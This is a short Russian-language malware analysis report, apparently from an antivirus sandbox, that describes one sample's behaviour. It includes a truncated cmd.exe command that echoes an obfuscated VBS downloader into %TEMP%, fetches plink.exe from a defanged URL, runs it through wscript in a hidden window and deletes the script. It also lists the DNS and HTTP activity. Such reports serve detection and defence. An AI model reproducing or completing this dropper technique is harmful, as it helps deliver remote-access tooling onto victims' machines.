Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c cd %TEMP% & @ECHO C2n= "http://th#.#arth.li/~sgtatham/putty/0.63/x86/plink.exe">>P3x.VBS &@ECHO Z7u = B7o("kgdifI`s`")>>P3x.VBS &@ECHO Set C8k = CreateObject(B7o("hnshgMIshgcook"))>>P3x.VBS ...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\p3x.vbs
- %TEMP%\plink.exe
Удаляет следующие файлы
- %TEMP%\p3x.vbs
Сетевая активность
TCP
Запросы HTTP GET
- http://th#.#arth.li/~sgtatham/putty/0.63/x86/plink.exe
UDP
- DNS ASK th#.#arth.li
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\wscript.exe' "%TEMP%\P3x.VBS"
- '%TEMP%\plink.exe'
- '<SYSTEM32>\cmd.exe' /c cd %TEMP% & @ECHO C2n= "http://th#.#arth.li/~sgtatham/putty/0.63/x86/plink.exe">>P3x.VBS &@ECHO Z7u = B7o("kgdifI`s`")>>P3x.VBS &@ECHO Set C8k = CreateObject(B7o("hnshgMIshgcook"))>>P3x.VBS ...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\timeout.exe' 13
